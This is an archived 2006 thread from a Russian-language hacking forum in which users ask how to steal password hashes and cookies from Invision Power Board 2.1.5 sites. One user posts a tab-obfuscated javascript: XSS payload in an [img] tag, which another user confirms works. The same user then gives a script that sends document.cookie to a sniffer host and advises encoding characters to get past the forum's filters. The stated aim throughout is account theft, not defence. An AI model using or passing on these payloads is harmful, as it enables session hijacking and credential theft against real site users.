ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Invision 2.1.5 Xss
  #1  
Старый 09.04.2006, 12:37
sexxx
Новичок
Регистрация: 03.04.2006
Сообщений: 8
Провел на форуме:
17441

Репутация: 0
По умолчанию Invision 2.1.5 Xss

Вобшем как можно унать хэш на это версии движка,
помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.
 

  #2  
Старый 09.04.2006, 12:40
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

Цитата:
помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.
а попробовать? не работает.
 

  #3  
Старый 09.04.2006, 12:53
iNcluDe
Новичок
Регистрация: 07.03.2006
Сообщений: 18
Провел на форуме:
50877

Репутация: 3
По умолчанию

Xss баг через репорт в 2.1.5 исправлен, он для 2.1.4
 

  #4  
Старый 09.04.2006, 13:52
sexxx
Новичок
Регистрация: 03.04.2006
Сообщений: 8
Провел на форуме:
17441

Репутация: 0
По умолчанию

Спасибо буду знать, а не подскажете как нибудь там можно сваравать хэш, может сплойт есть. Знаю что гугл рулит, но всё так преятней узнать от знающих людей. ПРобывал сам поискать чтоб хэш cтырить, но что то не выходит.
 

  #5  
Старый 09.04.2006, 14:22
member_ru
Познающий
Регистрация: 08.12.2005
Сообщений: 59
Провел на форуме:
39531

Репутация: 5
Отправить сообщение для member_ru с помощью ICQ
По умолчанию

sexxx, никак, пока XSSбаги там не нашли.
 

  #6  
Старый 09.04.2006, 15:30
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132

Репутация: 116


По умолчанию

Пока ничего такого нет. Версия ещё девственная. В смысле не поимел пока никто.
Можно через аватарку попробовать вроде бы. Но это только под Ie.
 

  #7  
Старый 09.04.2006, 20:49
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию

вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]
 

  #8  
Старый 09.04.2006, 21:47
Noth!nG
Познающий
Регистрация: 08.03.2006
Сообщений: 32
Провел на форуме:
94148

Репутация: 10
Отправить сообщение для Noth!nG с помощью ICQ
По умолчанию

Invision Power Board 2.1.5 до 2006-03-08 и версии до 2.1.x

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в модуле PM. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

P.S.: В инете искать пробовали?
 

  #9  
Старый 09.04.2006, 21:56
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию

Цитата:
Сообщение от CinerX  
вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]
Работает спасибо ))
а теперь после того как получил алерт что мне делать?
заранее спасибо
 

  #10  
Старый 10.04.2006, 01:38
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию

тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ